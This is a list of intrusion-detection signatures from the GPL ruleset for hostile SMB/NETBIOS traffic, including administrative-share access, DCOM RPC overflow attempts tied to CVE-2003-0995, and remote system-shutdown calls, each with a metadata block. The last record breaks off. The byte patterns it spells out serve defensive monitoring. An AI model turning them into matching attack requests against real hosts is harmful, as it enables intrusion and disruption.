alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102478; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102477

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102477; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102476

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|winreg|00|"; within:8; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102476; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102472

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"C|00 24 00 00 00|"; distance:2; nocase; content:!"I|00|P|00|C|00 24 00 00 00|"; within:10; distance:-10; nocase; classtype:protocol-command-decode; sid:2102472; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102473

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ADMIN$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"A|00|D|00|M|00|I|00|N|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102473; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ADMIN$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102470

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB C$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"C|00 24 00 00 00|"; distance:2; nocase; content:!"I|00|P|00|C|00 24 00 00 00|"; within:10; distance:-10; nocase; classtype:protocol-command-decode; sid:2102470; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB C$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102467

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB D$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"D|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102467; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB D$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102474

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"ADMIN|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102474; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102475

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"A|00|D|00|M|00|I|00|N|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102475; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102471

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"C|24 00|"; distance:2; nocase; content:!"IPC|24 00|"; within:5; distance:-5; nocase; classtype:protocol-command-decode; sid:2102471; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103425

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103425; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103426

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103426; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103177

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103177; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103176

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103176; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103427

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103427; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103428

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103428; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103179

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103179; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103178

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103178; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103377

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103377; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103378

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103378; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103379

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103379; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103380

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103380; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103393

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103393; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103396

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103396; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102942

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102942; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102943

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102943; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102944

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102944; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102945

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102945; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

